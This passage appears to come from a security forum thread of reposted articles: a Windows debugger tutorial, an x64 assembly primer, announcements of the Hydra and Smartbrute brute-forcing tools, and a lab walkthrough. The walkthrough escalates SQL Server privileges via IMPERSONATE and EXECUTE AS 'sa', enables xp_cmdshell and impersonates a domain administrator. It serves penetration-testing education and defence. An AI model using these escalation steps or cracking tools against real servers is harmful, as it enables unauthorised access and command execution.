MS Word. With visions of unbounded memcpy’s in our eyes, we fired a dumb fuzzer at the current version of Journal – and as expected it fell over pretty quickly and in several unique ways — we encourage you to do the same. Sursa: CVE-2014-1824 – A New Windows Fuzzing Target | BeyondTrust
-
Writing a Primitive Debugger: Part 3 (Call Stack, Registers, Contexts) Posted on December 5, 2014 by admin Up to now, all of the functionality discussed in writing a debugger has been related to getting a debugger attached to a process and being able to set breakpoints and perform single stepping. While certainly useful, this functionality is more passive debugging: you can break the state of the process at a certain point and instrument it at the instruction level, but you cannot actually modify any behavior, or even view how the process got to that state. The next core functionality that will be covered will detail actually being able to view and change program execution state (in the form of the thread context, namely registers), and being able to view the thread’s call stack upon hitting a breakpoint. Thread Contexts A thread context, as defined relevant to Windows, “includes the thread’s set of machine registers, the kernel stack, a thread environment block, and a user stack in the address space of the thread’s process.” For a usermode debugger, which is what is being developed in these posts, the important parts are the machine registers and the user stack. The thread environment block is also accessible from user-mode but won’t be covered here due to its undocumented and very specific nature. When a process starts up, the loader will set up the processes main thread and begin execution at the entry point. This main thread can in turn launch additional threads, which themselves launch threads, and so on. Each of these threads will have their own context containing the items listed above. The purpose of these contexts is that Windows, being a preemptive multitasking operating system, can have any [usermode] task, such as a thread executing code, interrupted at any point in time. During these interruptions, a context switch will be carried out, which is simply the process of saving the current execution context and setting the new one to execute. Eventually, when the original task is scheduled to resume, a context switch will again occur back to the context of the original thread and it will continue executing as if nothing had happened. What do these contexts look like? The answer is that it is entirely processor-specific, which shouldn’t be too surprising given that they store registers. In Windows, the part of the thread context that is available to developers comes defined as a CONTEXT structure in winnt.h. For example, below is asnippet from a CONTEXT structure for x86 processors. [TABLE] [TR] [TD=class: code]typedef struct _CONTEXT { DWORD Dr0; DWORD Dr1; DWORD Dr2; ... FLOATING_SAVE_AREA FloatSave; DWORD SegGs; DWORD SegFs; ... DWORD Edi; DWORD Esi; DWORD Ebx; ... DWORD Ebp; DWORD Eip; ... [/TD] [/TR] [/TABLE] The x64 version looks pretty closely related, with register widths being extended to 64-bits as well as additional registers and extensions added. [TABLE] [TR] [TD=class: code]typedef struct DECLSPEC_ALIGN(16) _CONTEXT { DWORD ContextFlags; DWORD MxCsr; ... WORD SegGs; WORD SegSs; DWORD EFlags; ... DWORD64 Rax; DWORD64 Rcx; DWORD64 Rdx; ... DWORD64 R13; DWORD64 R14; DWORD64 R15; ...[/TD] [/TR] [/TABLE] This is the structure that will be the most useful to inspect and modify when debugging. A debugger should be able to print out this structure and allow for modification of any of its fields. Fortunately, there are two very useful APIs for retrieving and modifying this structure: GetThreadContext and SetThreadContext. These have been covered previously when discussing how to enable single-stepping. The context had to be retrieved and the EFlags registered modified. So what modifications are needed to the existing code/logic in order to add this functionality? It’s as simple as opening a handle to the current executing (or in the debuggers case, broken) thread and retrieving/setting the context. [TABLE] [TR] [TD=class: code]const CONTEXT Debugger::GetExecutingContext() { CONTEXT ctx = { 0 }; ctx.ContextFlags = CONTEXT_ALL; SafeHandle hThread = OpenCurrentThread(); if (hThread.IsValid()) { bool bSuccess = BOOLIFY(GetThreadContext(hThread(), &ctx)); if (!bSuccess) { fprintf(stderr, "Could not get context for thread %X. Error = %X\n", m_dwExecutingThreadId, GetLastError()); } } memcpy(&m_lastContext, &ctx, sizeof(CONTEXT)); return ctx; } const bool Debugger::SetExecutingContext(const CONTEXT &ctx) { bool bSuccess = false; SafeHandle hThread = OpenCurrentThread(); if (hThread.IsValid()) { bSuccess = BOOLIFY(SetThreadContext(hThread(), &ctx)); } memcpy(&m_lastContext, &ctx, sizeof(CONTEXT)); return bSuccess; }[/TD] [/TR] [/TABLE] For each access or modification, there is a handle opened (and closed) to the current thread — this certainly isn’t the most efficient approach, but serves well enough for demo purposes. The state of the context is then stored in m_lastContext. These functions are invoked when the process receives an EXCEPTION_BREAKPOINT and when single stepping the process, i.e. handling the EXCEPTION_SINGLE_STEP exception. Therefore, m_lastContext will always have the appropriate register values in the context structure when a breakpoint is hit or when the user is single stepping. These functions can also be invoked when the user wants to modify a certain register or registers through the debugger interface. Printing the context involves nothing more than printing out the values in the structure. I’ve chosen to only print out the more commonly used registers for the example code: [TABLE] [TR] [TD=class: code]void Debugger::PrintContext() { #ifdef _M_IX86 fprintf(stderr, "EAX: %p EBX: %p ECX: %p EDX: %p\n" "ESP: %p EBP: %p ESI: %p EDI: %p\n" "EIP: %p FLAGS: %X\n", m_lastContext.Eax, m_lastContext.Ebx, m_lastContext.Ecx, m_lastContext.Edx, m_lastContext.Esp, m_lastContext.Ebp, m_lastContext.Esi, m_lastContext.Edi, m_lastContext.Eip, m_lastContext.EFlags); #elif defined _M_AMD64 fprintf(stderr, "RAX: %p RBX: %p RCX: %p RDX: %p\n" "RSP: %p RBP: %p RSI: %p RDI: %p\n" "R8: %p R9: %p R10: %p R11: %p\n" "R12: %p R13: %p R14: %p R15: %p\n" "RIP: %p FLAGS: %X\n", m_lastContext.Rax, m_lastContext.Rbx, m_lastContext.Rcx, m_lastContext.Rdx, m_lastContext.Rsp, m_lastContext.Rbp, m_lastContext.Rsi, m_lastContext.Rdi, m_lastContext.R8, m_lastContext.R9, m_lastContext.R10, m_lastContext.R11, m_lastContext.R12, m_lastContext.R13, m_lastContext.R14, m_lastContext.R15, m_lastContext.Rip, m_lastContext.EFlags); #else #error "Unsupported architecture" #endif }[/TD] [/TR] [/TABLE] Call Stacks At the lowest level, the scope of a function is defined by its stack frame. This is a compiler and/or ABI defined construct for how the state of the function will be layed out. A stack frame typically includes the return address of the caller, any parameters that were passed to the function from the caller, and space for local variables that exist within the scope of the function. For x86 and x64, among other architectures, these stack frames are preceded with a prologue, which is the code responsible for setting up the stack and frame pointers (ESP/EBP or RSP/RBP) from the caller to the callee. Prior to the callee returning, there is an epilogue, which is responsible for returning the stack and frame pointers to that of the caller. For example, consider the following C function: [TABLE] [TR] [TD=class: code]void TestFunction(int a, int b, int c) { int d = 4, e = 5, f = 6; }[/TD] [/TR] [/TABLE] which was called in the following way [TABLE] [TR] [TD=class: code]push 3 push 2 push 1 call TestFunction[/TD] [/TR] [/TABLE] Disassembled as x86, this becomes: push ebp mov ebp,esp sub esp,0Ch mov dword ptr [ebp-4],4 mov dword ptr [ebp-8],5 mov dword ptr [ebp-0Ch],6 mov esp,ebp pop ebp ret 0Ch The prologue and epilogue are highlighted in orange. After the execution of the prologue, the stack frame for this function will contain the callers frame pointer in [EBP], the return address at [EBP+4] (because the CALL instruction implicitly pushes the address of the next instruction on the stack before changing execution), and the passed parameters at [EBP+8], [EBP+12], and [EBP+16]. The prologue subtracted 12 from the base of the stack to make room for local variables — the three 32-bit ints declared within the function. These will be at [EBP-4], [EBP-8], and [EBP-12], as can be see in the disassembly. This setup is pretty convenient because it offers easy distinction between what is a parameter and what is a local variable. Debugging becomes a bit easier since everything is held on the stack and indexed through the frame pointer, rather than scattered around between registers and the stack. This changes a bit as you go from x86 to x64, where x64 will store the first four (or six, depending on your compiler/platform) arguments in registers, and the rest on the stack. This can also change a bit depending on calling conventions and compiler optimizations, especially frame-pointer omission. Since the stack frame stores the return address of the caller, it is possible to see where the function was called from. That is what the call stack is: a collection of stack frames that represent the call chain in the code leading up to the current stack frame. This information is very useful to have in terms of debugging, because a bug that presented itself in one function may have manifested earlier on in the code. Being able to quickly traverse frames, and see the values within those frames, is an invaluable aid to debugging. On the Windows platform, there is a convenient function that performs the tedium/annoyance of walking stack frames backwards: StackWalk64. This function is x86 and x64 compatible, but does require some setup prior to being invoked. Given the very machine-specific layout of stack frames, the StackWalk64 function requires filling out a STACKFRAME64 structure, which will be passed to it as an argument. Filling out this structure merely involves setting the instruction, frame, and stack pointers, along with the address modes, which will be flat addressing for the case of modern Windows on x86 and x64. Once this structure is set up, StackWalk64 can be called in a loop to retrieve the frames. Put into code, it looks like the following: [TABLE] [TR] [TD=class: code]void Debugger::PrintCallStack() { STACKFRAME64 stackFrame = { 0 }; const DWORD_PTR dwMaxFrames = 50; CONTEXT ctx = GetExecutingContext(); stackFrame.AddrPC.Mode = AddrModeFlat; stackFrame.AddrFrame.Mode = AddrModeFlat; stackFrame.AddrStack.Mode = AddrModeFlat; #ifdef _M_IX86 DWORD dwMachineType = IMAGE_FILE_MACHINE_I386; stackFrame.AddrPC.Offset = ctx.Eip; stackFrame.AddrFrame.Offset = ctx.Ebp; stackFrame.AddrStack.Offset = ctx.Esp; #elif defined _M_AMD64 DWORD dwMachineType = IMAGE_FILE_MACHINE_AMD64; stackFrame.AddrPC.Offset = ctx.Rip; stackFrame.AddrFrame.Offset = ctx.Rbp; stackFrame.AddrStack.Offset = ctx.Rsp; #else #error "Unsupported platform" #endif SafeHandle hThread = OpenCurrentThread(); for (int i = 0; i < dwMaxFrames; ++i) { const bool bSuccess = BOOLIFY(StackWalk64(dwMachineType, m_hProcess(), hThread(), &stackFrame, (dwMachineType == IMAGE_FILE_MACHINE_I386 ? nullptr : &ctx), nullptr, SymFunctionTableAccess64, SymGetModuleBase64, nullptr)); if (!bSuccess || stackFrame.AddrPC.Offset == 0) { fprintf(stderr, "StackWalk64 finished.\n"); break; } fprintf(stderr, "Frame: %X\n" "Execution address: %p\n" "Stack address: %p\n" "Frame address: %p\n", i, stackFrame.AddrPC.Offset, stackFrame.AddrStack.Offset, stackFrame.AddrFrame.Offset); } }[/TD] [/TR] [/TABLE] Testing the functionality To test this functionality we can create another demo app that will be used as the debug target. The simple one below is what I used: [TABLE] [TR] [TD=class: code]#include <cstdio> void d() { printf("d called.\n"); } void c() { printf("c called.\n"); d(); } void b() { printf("b called.\n"); c(); } void a() { printf("a called.\n"); b(); } int main(int argc, char *argv[]) { printf("Addresses: \n" "a: %p\n" "b: %p\n" "c: %p\n" "d: %p\n", a, b, c, d); getchar(); while (true) { a(); getchar(); } return 0; }[/TD] [/TR] [/TABLE] I would recommend disabling incremental linking and ASLR (on the executable, not the system) for convenience sake. Below is the stack trace that Visual Studio produces when a breakpoint is set inside the d function and hit. Demo.exe!d() Line 5 C++ Demo.exe!c() Line 14 C++ Demo.exe!b() Line 20 C++ Demo.exe!a() Line 26 C++ Demo.exe!main(int argc, char * * argv) Line 41 C++ Demo.exe!__tmainCRTStartup() Line 626 C Demo.exe!mainCRTStartup() Line 466 C kernel32.dll!@BaseThreadInitThunk@12() Unknown ntdll.dll!___RtlUserThreadStart@8() Unknown ntdll.dll!__RtlUserThreadStart@8() Unknown Attaching with the debugger also yields 10 frames, as listed below: a Target address: 0x4010f0 Received breakpoint at address 004010F0 Press c to continue or s to begin stepping. l Frame: 0 Execution address: 004010F0 Stack address: 00000000 Frame address: 0018FBE4 Frame: 1 Execution address: 004010DA Stack address: 00000000 Frame address: 0018FBE8 Frame: 2 Execution address: 0040108A Stack address: 00000000 Frame address: 0018FCBC Frame: 3 Execution address: 0040103A Stack address: 00000000 Frame address: 0018FD90 Frame: 4 Execution address: 004011C6 Stack address: 00000000 Frame address: 0018FE64 Frame: 5 Execution address: 00401699 Stack address: 00000000 Frame address: 0018FF38 Frame: 6 Execution address: 004017DD Stack address: 00000000 Frame address: 0018FF88 Frame: 7 Execution address: 75D5338A Stack address: 00000000 Frame address: 0018FF90 Frame: 8 Execution address: 77339F72 Stack address: 00000000 Frame address: 0018FF9C Frame: 9 Execution address: 77339F45 Stack address: 00000000 Frame address: 0018FFDC StackWalk64 finished. The output is a bit less elegant than the Visual Studio debugger, but it is correct, which is the more important part. It would be nice, however, to put names to some of those addresses. That is where symbol loading and mapping come in, which will be the subject of the next post. Article Roadmap Future posts will be related on topics closely following the items below: Basics Adding/Removing Breakpoints, Single-stepping Call Stack, Registers, Contexts Symbols Miscellaneous Features The full source code relating to this can be found here. C++11 features were used, so MSVC 2012/2013 is most likely required. Follow me Sursa: Writing a Primitive Debugger: Part 3 (Call Stack, Registers, Contexts) | RCE Endeavors
-
Say hello to x64 Assembly [part 1]
Nytro posted a topic in Reverse engineering & exploit development
Say hello to x64 Assembly [part 1] Introduction There are many developers between us. We write a tons of code every day. Sometime, it is even not a bad code Every of us can easily write the simplest code like this: [TABLE=class: lines highlight] [TR] [TD=class: line-numbers] 1 [/TD] [TD=class: line-data] #include <stdio.h> int main() { int x = 10; int y = 100; printf("x + y = %d", x + y); return 0; } [/TD] [/TR] [/TABLE] view raw gistfile1.c hosted with ? by GitHub Every of us can understand what's this C code does. But... How this code works at low level? I think that not all of us can answer on this question, and me too. I thought that i can write code on high level programming languages like Haskell, Erlang, Go and etc..., but i absolutely don't know how it works at low level, after compilation. So I decided to take a few deep steps down, to assembly, and to describe my learning way about this. Hope it will be interesting, not only for me. Something about 5 - 6 years ago I already used assembly for writing simple programs, it was in university and i used Turbo assembly and DOS operating system. Now I use Linux-x86-64 operating system. Yes, must be big difference between Linux 64 bit and DOS 16 bit. So let's start. Preparation Before we started, we must to prepare some things like As I wrote about, I use Ubuntu (Ubuntu 14.04.1 LTS 64 bit), thus my posts will be for this operating system and architecture. Different CPU supports different set of instructions. I use Intel Core i7 870 processor, and all code will be written processor. Also i will use nasm assembly. You can install it with: sudo apt-get install nasm It's version must be 2.0.0 or greater. I use NASM version 2.10.09 compiled on Dec 29 2013 version. And the last part, you will need in text editor where you will write you assembly code. I use Emacs with nasm-mode.el for this. It is not mandatory, of course you can use your favourite text editor. If you use Emacs as me you can download nasm-mode.el and configure your Emacs like this: [TABLE=class: lines highlight] [TR] [TD=class: line-numbers] 1 2 3[/TD] [TD=class: line-data] (load "~/.emacs.d/lisp/nasm.el") (require 'nasm-mode) (add-to-list 'auto-mode-alist '("\\.\\(asm\\|s\\)$" . nasm-mode)) [/TD] [/TR] [/TABLE] view raw gistfile1.el hosted with ? by GitHub That's all we need for this moment. Other tools will be describe in next posts. x64 syntax Here I will not describe full assembly syntax, we'll mention only those parts of the syntax, which we will use in this post. Usually NASM program divided into sections. In this post we'll meet 2 following sections: data section text section The data section is used for declaring constants. This data does not change at runtime. You can declare various math or other constants and etc... The syntax for declaring data section is: section .data The text section is for code. This section must begin with the declaration global _start, which tells the kernel where the program execution begins. section .text global _start _start: Comments starts with ; symbol. Every NASM source code line contains some combination of the following four fields: [label:] instruction [operands] [; comment] Fields which are in square brackets are optional. A basic NASM instruction consists from two parts. The first one is the name of the instruction which is to be executed, and the second are the operands of this command. For example: MOV COUNT, 48 ; Put value 48 in the COUNT variable Hello world Let's write first program with NASM assembly. And of course it will be traditional Hello world program. Here is the code of it: [TABLE=class: lines highlight] [TR] [TD=class: line-numbers] 1 [/TD] [TD=class: line-data] section .data msg db "hello, world!" section .text global _start _start: mov rax, 1 mov rdi, 1 mov rsi, msg mov rdx, 13 syscall mov rax, 60 mov rdi, 0 syscall [/TD] [/TR] [/TABLE] view raw gistfile1.asm hosted with ? by GitHub Yes, it doesn't look like printf("Hello world"). Let's try to understand what is it and how it works. Take a look 1-2 lines. We defined data section and put there msg constant with Hello world value. Now we can use this constant in our code. Next is declaration text section and entry point of program. Program will start to execute from 7 line. Now starts the most interesting part. We already know what is it mov instruction, it gets 2 operands and put value of second to first. But what is it these rax, rdi and etc... As we can read at wikipedia: A central processing unit (CPU) is the hardware within a computer that carries out the instructions of a computer program by performing the basic arithmetical, logical, and input/output operations of the system. Ok, CPU performs some operations, arithmetical and etc... But where can it get data for this operations? The first answer in memory. However, reading data from and storing data into memory slows down the processor, as it involves complicated processes of sending the data request across the control bus. Thus CPU has own internal memory storage locations called registers: So when we write mov rax, 1, it means to put 1 to the rax register. Now we know what is it rax, rdi, rbx and etc... But need to know when to use rax but when rsi and etc... rax - temporary register; when we call a syscal, rax must contain syscall number rdx - used to pass 3rd argument to functions rdi - used to pass 1st argument to functions rsi - pointer used to pass 2nd argument to functions In another words we just make a call of sys_write syscall. Take a look on sys_write: [TABLE=class: lines highlight] [TR] [TD=class: line-numbers] 1[/TD] [TD=class: line-data] ssize_t sys_write(unsigned int fd, const char * buf, size_t count) [/TD] [/TR] [/TABLE] view raw gistfile1.c hosted with ? by GitHub It has 3 arguments: fd - file descriptor. Can be 0, 1 and 2 for standard input, standard output and standard error buf - points to a character array, which can be used to store content obtained from the file pointed to by fd. count - specifies the number of bytes to be written from the file into the character array So we know that sys_write syscall takes three arguments and has number one in syscall table. Let's look again to our hello world implementation. We put 1 to rax register, it means that we will use sys_write system call. In next line we put 1 to rdi register, it will be first argument of sys_write, 1 - standard output. Then we store pointer to msg at rsi register, it will be second buf argument for sys_write. And then we pass the last (third) parameter (length of string) to rdx, it will be third argument of sys_write. Now we have all arguments of sys_write and we can call it with syscall function at 11 line. Ok, we printed "Hello world" string, now need to do correctly exit from program. We pass 60 to rax register, 60 is a number of exit syscall. And pass also 0 to rdi register, it will be error code, so with 0 our program must exit successfully. That's all for "Hello world". Quite simple Now let's build our program. For example we have this code in hello.asm file. Then we need to execute following commands: nasm -f elf64 -o hello.o hello.asm ld -o hello hello.o After it we will have executable hello file which we can run with ./hello and will see Hello world string in the terminal. Conclusion It was a first part with one simple-simple example. In next part we will see some arithmetic. If you will have any questions/suggestions write me a comment. All source code you can find - here. Sursa: Code as Art: Say hello to x64 Assembly [part 1] -
Hydra Network Logon Cracker 8.1 Authored by van Hauser, thc | Site thc.org THC-Hydra is a high quality parallelized login hacker for Samba, Smbnt, Cisco AAA, FTP, POP3, IMAP, Telnet, HTTP Auth, LDAP, NNTP, MySQL, VNC, ICQ, Socks5, PCNFS, Cisco and more. Includes SSL support, parallel scans, and is part of Nessus. Changes: Multiple patches added. The -M option is fixed. Various other small fixes and enhancements. Download: Download: Hydra Network Logon Cracker 8.1 ? Packet Storm Sursa: Hydra Network Logon Cracker 8.1 ? Packet Storm
-
THC Smartbrute 1.0 Authored by thc | Site thc.org THC-smartbrute is a smart card instruction bruteforcing tool. Download: Download: THC Smartbrute 1.0 ? Packet Storm Sursa: THC Smartbrute 1.0 ? Packet Storm
-
[h=2]Hacking SQL Server Stored Procedures – Part 2: User Impersonation[/h] Scott Sutherland | December 8, 2014 Application developers often use SQL Server stored procedures to make their code more modular, and help apply the principle of least privilege. Occasionally those stored procedures need to access resources external to their application’s database. In order to satisfy that requirement sometimes developers use the IMPERSONATE privilege and the EXECUTE AS function to allow the impersonation of other logins on demand. Although this isn’t really a vulnerability, this type of weak configuration often leads to privilege escalation. This blog provides a lab guide and attack walk-through that can be used to gain a better understanding of how the IMPERSONATE privilege can lead to privilege escalation in SQL Server. This should be interesting to penetration testers, application developers, and dev-ops. However, it will most likely be pretty boring to DBAs that know what they’re doing. Below is a summary of the topics being covered: Setting up a Lab Finding SQL Server Logins that can be Impersonated Impersonating SQL Logins and Domain Accounts Automating Escalation with Metasploit and PowerShell Alternatives to Impersonation [h=2]Setting up a Lab[/h] Below I’ve provided some basic steps for setting up a SQL Server instance that can be used to replicate the scenario covered in this blog. Download the Microsoft SQL Server Express install that includes SQL Server Management Studio. It can be download at Download Microsoft SQL Server 2014 Express. Install SQL Server by following the wizard, but make sure to enabled mixed-mode authentication and run the service as LocalSystem for the sake of the lab. Make sure to enable the tcp protocol so that we can connect to the listener remotely. Instructions can be found at How to: Configure Express to accept remote connections - SQL Server Express WebLog - Site Home - MSDN Blogs. Log into the SQL Server with the “sa” account setup during the installation using the SQL Server Management Studio application that comes with SQL Server. Press the “New Query” button and use the TSQL below to create the new users for the lab. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code] -- Create login 1 CREATE LOGIN MyUser1 WITH PASSWORD = 'MyPassword!'; -- Create login 2 CREATE LOGIN MyUser2 WITH PASSWORD = 'MyPassword!'; -- Create login 3 CREATE LOGIN MyUser3 WITH PASSWORD = 'MyPassword!'; -- Create login 4 CREATE LOGIN MyUser4 WITH PASSWORD = 'MyPassword!'; [/TD] [/TR] [/TABLE] Provide the MyUser1 login with permissions to impersonate MyUser2, MyUser3, and sa. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code] -- Grant myuser1 impersonate privilege on myuser2, myuser3, and sa USE master; GRANT IMPERSONATE ON LOGIN::sa to [MyUser1]; GRANT IMPERSONATE ON LOGIN::MyUser2 to [MyUser1]; GRANT IMPERSONATE ON LOGIN::MyUser3 to [MyUser1]; GO [/TD] [/TR] [/TABLE] [h=2]Finding SQL Server Logins that can be impersonated[/h] The first step to impersonating another login is findings which ones your account is allowed to impersonate. By default, sysadmins can impersonate anyone, but normal logins must be assigned privileges to impersonate specific users. Below are the instructions for finding out what users you can impersonate. Log into the SQL Server as the MyUser1 login using SQL Server Management Studio. Run the query below to get a list of logins that can be impersonated by the “MyUser1” login. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code] -- Find users that can be impersonated SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE' [/TD] [/TR] [/TABLE] Below is a screenshot of the expected results. Note: In the example above, the query is being executed via a direct database connection, but in the real world external attackers are more likely to execute it via SQL injection. [h=2]Impersonating SQL Logins and Domain Accounts[/h] Now that we have a list of logins that we know we can impersonate we can start escalating privileges. J In this section I’ll show how to impersonate users, revert to your original user, and impersonate domain users (like the domain admin). Fun fun fun… [h=3]Impersonating SQL Server Logins[/h] Log into the SQL Server using the MyUser1 login (if you’re not already). Verify that you are running as a SQL login that does not have the sysadmin role. Then run EXECTUTE AS to impersonate the sa login that was identified in the last section. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code] -- Verify you are still running as the myuser1 login SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER('sysadmin') -- Impersonate the sa login EXECUTE AS LOGIN = 'sa' -- Verify you are now running as the sa login SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER('sysadmin') [/TD] [/TR] [/TABLE] Below is an example of the expected output. Now you should be able to access any database and enable/run xp_cmdshell to execute commands on the operating system as the SQL Service service account (LocalSystem). Below is some example code. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code] -- Enable show options EXEC sp_configure 'show advanced options',1 RECONFIGURE GO -- Enable xp_cmdshell EXEC sp_configure 'xp_cmdshell',1 RECONFIGURE GO -- Quickly check what the service account is via xp_cmdshell EXEC master..xp_cmdshell 'whoami' [/TD] [/TR] [/TABLE] Below is an example of the expected output: Tada! In this scenario we were able to become the sysadmin “sa”. You may not always get a sysadmin account right out of the gate, but at a minimum you should get additional data access when impersonating other logins. Note: Even a small increase in privileges can provide the first step in an escalation chain. For example, if you have the rights to impersonate a db_owner you may be able to escalate to a syadmin using the attack I covered in my last blog. It can be found here. [h=3]Impersonating SQL Logins as Sysadmin[/h] Once you’ve obtained a sysadmin account you have the ability to impersonate database login you want. You can grab a full list of logins from the . [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code] -- Get a list of logins SELECT * FROM master.sys.sysusers WHERE islogin = 1 [/TD] [/TR] [/TABLE] Screenshot below: Once you have the list it’s pretty easy to become anyone. Below is an example of impersonating the MyUser4 login. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code] -- Verify you are still impersonating sa select SYSTEM_USER select IS_SRVROLEMEMBER('sysadmin') -- Impersonate MyUser4 EXECUTE AS LOGIN = 'MyUser4' -- Verify you are now running as the the MyUser4 login SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER('sysadmin') -- Change back to sa REVERT [/TD] [/TR] [/TABLE] Below is a screenshot: Note: Make sure to REVERT back to the sysadmin account when you’re done. Otherwise you’ll continue to run under the context of the MyUser4 login. [h=3]Impersonating Domain Admins as a Sysadmin[/h] Did I mention that you can impersonate any user in Active Directory? As it turns out it doesn’t even have to be mapped to an SQL Server login. However, the a catch is that it only applies to the SQL Server. That’s mostly because the SQL Server has no way to authenticate the Domain User to another system…that I’m aware of. So it’s not actually as cool as it sounds, but still kind of fun. Note: Another important note is that when you run xp_cmdshell while impersonating a user all of the commands are still executed as the SQL Server service account, NOT the SQL Server login or impersonated domain user. Below is a basic example of how to do it: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code] -- Get the domain of the SQL Server SELECT DEFAULT_DOMAIN() -- Impersonate the domain administrator EXECUTE AS LOGIN = 'DEMO\Administrator' -- Verify you are now running as the Domain Admin SELECT SYSTEM_USER [/TD] [/TR] [/TABLE] Note: Remember that the domain will be different for everyone. In my example the domain is “DEMO”. Below is an example of the expected output. Revert to the original Login If you get sick of being a sysadmin or a Pseudo Domain Admin you can always REVERT to your original login again. Just be aware that if you run the impersonation multiple times you may have to run REVERT multiple times. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code] -- Revert to your original login REVERT -- Verify you are now running as the MyUser1 login SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER('sysadmin') [/TD] [/TR] [/TABLE] [h=2]1.5 Automating Escalation with Metasploit and PowerShell[/h] Since I’m lazy and don’t like to type more that I have to, I wrote a Metasploit module and PowerShell script to automate the attack for direct database connections. I also wrote a Metasploit module to execute the escalation via error based SQL injection. Big thanks to guys on the Metasploit team who helped me get the modules into the framework. [h=3]Metasploit Module: mssql_escalate_executeas[/h] Below is an example of the mssql_escalate_executeas module being used to escalate the privileges of the myuser1 login using a direct database connection. Typically this would happen during an internal penetration test after guessing database user/passwords or finding database connection strings. [h=3]Metasploit Module: mssql_escalate_executeas_sqli[/h] Below is an example of the mssql_escalate_executeas_sqli module being used to escalate the privileges of the myuser1 login using error based SQL injection. This is more practical during external network penetration tests. Mostly because SQL injection is pretty common and database ports usually are not exposed to the internet. Anyway pretty screenshot below… [h=3]PowerShell Script[/h] For those who like to play around with PowerShell, I also put a script together that can be used to escalate the privileges of the myuser1 login via a direct database connection. It can be downloaded from https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-ExecuteAs.psm1. The module can be imported with the command below. Also, I’m aware the name is comically long, but at this point I’m just trying to be descriptive. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code] Import-Module .\Invoke-SqlServer-Escalate-ExecuteAs.psm1 [/TD] [/TR] [/TABLE] Then you can run it with the following command. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code] Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuser1 -SqlPass MyPassword! [/TD] [/TR] [/TABLE] Below is a basic screenshot of what it looks like when it runs. [h=2]Alternatives to Impersonation[/h] There quite a few options for providing stored procedures with access to external resources without providing SQL logins with the privileges to impersonate other users at will. However, they all come with their own risks and implementation challenges. Hopefully, I’ll have some time in the near future to cover each in more depth, but below is a summary of common options. Create roles with the required privileges on external objects. This doesn’t always make least privilege easy, and can generally be a management pain. Use cross local/database ownership chaining. This one can end in escalation paths as well. More information can be found at cross db ownership chaining Server Configuration Option. Use EXECUTE WITH in the stored procedure to run as the stored procedure owner. This isn’t all bad, but can result in escalation paths if the store procedure is vulnerable to SQL injection, or is simply written to allow users to take arbitrary actions. Use signed stored procedures that have been assigned access to external objects. This seems like the most secure option with the least amount of management overhead. Similar to the EXECUTE WITH option, this can result in escalation paths if the store procedure is vulnerable to SQL injection, or is simply written to allow users to take arbitrary actions. More information at Tutorial: Signing Stored Procedures with a Certificate. [h=2]Wrap Up[/h] The issues covered in this blog/lab were intended to help pentesters, developers, and dev-ops gain a better understanding of how the IMPERSONATE privilege can be used an abused. Hopefully the information is useful. Have fun with it, but don’t forget to hack responsibly. [h=2]References[/h] EXECUTE AS Clause (Transact-SQL) REVERT (Transact-SQL) Sursa: https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/
-
Code Execution In Spite Of BitLocker Dec 8, 2014 Disk Encryption is “a litany of difficult tradeoffs and messy compromises” as our good friend and mentor Tom Ptacek put it in his blog post. That sounds depressing, but it’s pretty accurate - trying to encrypt an entire hard drive is riddled with constraints. For example: Disk Encryption must be really, really fast. Essentially, if the crypto happens slower than the disk read speed (said another way, if the CPU is a bottleneck) - your solution is untenable to the mass market It must support random read and write access - any sector may be read at any time, and any sector may be updated at any time You really need to avoid updating multiple sectors for a single write - if power is lost during the operation, the inconsistencies will not be able to be resolved easily, if at all People expect hard disks to provide roughly the amount of advertised space. Stealing significant amounts of space for ‘overhead’ is not feasible. (This goes doubly so if encryption is applied after operating system installation - there may not be space to steal!) The last two constraints mean that the ciphertext must be the exact same size as the plaintext. There’s simply no room to store IVs, nonces, counters, or authentication tags. And without any of those things, there’s no way to provide cryptographic authentication in any of the common ways we know how to provide it. No HMACs over the sector and no room for a GCM tag (or OCB, CCM, or EAX, all of which expand the message). Which brings us to… Poor-Man’s Authentication Because of the constraints imposed by the disk format, it’s extremely difficult to find a way to correctly authenticate the ciphertext. Instead, disk encryption relies on ‘poor-man’s authentication’. The best solution is to use poor-man’s authentication: encrypt the data and trust to the fact that changes in the ciphertext do not translate to semantically sensible changes to the plaintext. For example, an attacker can change the ciphertext of an executable, but if the new plaintext is effectively random we can hope that there is a far higher chance that the changes will crash the machine or application rather than doing something the attacker wants. We are not alone in reaching the conclusion that poor-man’s authentication is the only practical solution to the authentication problem. All other disk-level encryption schemes that we are aware of either provide no authentication at all, or use poor-man’s authentication. To get the best possible poor-man’s authentication we want the BitLocker encryption algorithm to behave like a block cipher with a block size of 512–8192 bytes. This way, if the attacker changes any part of the ciphertext, all of the plaintext for that sector is modified in a random way. That excerpt comes from an excellent paper by Niels Ferguson of Microsoft in 2006 explaining how BitLocker works. The property of changing a single bit, and it propagating to many more bits, is diffusion and it’s actually a design goal of block ciphers in general. When talking about disk encryption in this post, we’re going to use diffusion to refer to how much changing a single bit (or byte) on an encrypted disk affects the resulting plaintext. BitLocker in Windows Vista & 7 When BitLocker was first introduced, it operated in AES-CBC with something called the Elephant Diffuser. The BitLocker paper is an excellent reference both on how Elephant works, and why they created it. At its heart, 